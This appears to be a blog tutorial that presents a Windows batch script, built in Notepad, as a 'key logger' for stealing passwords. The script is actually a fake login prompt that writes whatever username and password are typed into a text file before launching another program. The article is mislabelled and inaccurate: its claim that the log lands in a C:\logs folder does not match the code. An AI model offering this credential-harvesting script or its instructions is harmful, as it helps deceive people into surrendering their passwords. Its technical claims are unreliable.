Lets Jump To Your Choice
How To Create Key Logger Using Notepad For Simple Password Stealing. Create Key Logger Using Notepad – Have you ever thought about Key Logger. This is an application to developed to map your Key Strokes and save it is a .TXT file. This software is used for password hacking. This means that if you type your password on any web page then it will be automatically saved by the key logger. Within some days we will also add the precautions and how to be safe from Key Loggers. So stay tuned with us for more information. Have fun with this article ” Create Key Logger Using Notepad “You can also read How Anyone Can Hack Your Whatsapp Account.
Lets Know What Key Logger Is :
Key Logger is program which is made to secretly monitor your each and every key strokes. We are publishing this article for educational purpose only. We do not have any motive to create any violation. Try this at your own risk. And if you misuse it then you may be prosecuted to legal actions. Hurry up and know How To Make Your Own Key Logger.
Make Key Logger From Notepad :
- First of all open Notepad on your Pc or Laptop.
- Now paste this code.
echo Please Enter Your Email Address And Password
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
- Now click on File >> Save As and then in “select save as type” select All Files.
- Keep this name of the file Logs.bat on your desktop.
- Open your C: drive (Commonly known as Local Disk C:)
- Create a folder named logs.
- Its the time to test your Logs.Bat file.
- Open Logs.bat from your desktop.
- Now enter your any test username as well as password.
- Then will see that a text document is created in the logs folder in your C: drive.
- Open the text file and you will see that the username and password you entered will be there.
- Hurray you have successfully made your key logger.
Final Words :
This is a full working trick to make a key logger from notepad. If you want to be safe from such threats then you can read this article on Kaspersky Labs. Comment if you face any problem at any step.